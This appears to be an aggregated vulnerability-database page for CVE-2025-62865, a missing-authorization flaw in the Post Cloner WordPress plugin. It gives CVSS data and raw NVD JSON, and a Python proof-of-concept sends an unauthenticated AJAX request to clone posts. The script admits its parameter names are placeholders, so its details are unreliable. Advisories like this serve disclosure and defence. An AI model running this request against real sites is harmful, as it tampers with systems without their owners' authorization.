Security Vulnerability Report
中文
CVE-2025-62865 CVSS 5.3 MEDIUM

CVE-2025-62865

Published: 2025-12-09 16:18:04
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Evan Herman Post Cloner post-cloner allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Cloner: from n/a through <= 1.0.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Post Cloner <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62865 PoC - Missing Authorization in Post Cloner plugin # Target: WordPress site with Post Cloner plugin <= 1.0.0 target_url = "http://target-wordpress-site.com" # PoC: Exploit the missing authorization to clone posts # The plugin's clone function is accessible without proper authorization check def exploit_cve_2025_62865(): """ This PoC demonstrates the broken access control vulnerability in Post Cloner. The plugin does not properly verify user permissions before cloning posts. """ # Step 1: Identify the vulnerable endpoint clone_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Step 2: Craft the request with necessary parameters # The actual parameter names may vary - these are placeholders data = { 'action': 'post_cloner_clone', # Plugin AJAX action 'post_id': 1, # Target post ID to clone 'nonce': '' # Some versions may not properly validate nonce } # Step 3: Send the request without authentication # If vulnerable, this will clone the post without authorization response = requests.post(clone_endpoint, data=data) if response.status_code == 200: print("[+] Potential vulnerability confirmed - Unauthorized clone successful") print(f"[+] Response: {response.text}") else: print("[-] Request failed or patch applied") if __name__ == "__main__": exploit_cve_2025_62865()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62865", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:03.523", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Evan Herman Post Cloner post-cloner allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Cloner: from n/a through <= 1.0.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/post-cloner/vulnerability/wordpress-post-cloner-plugin-1-0-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}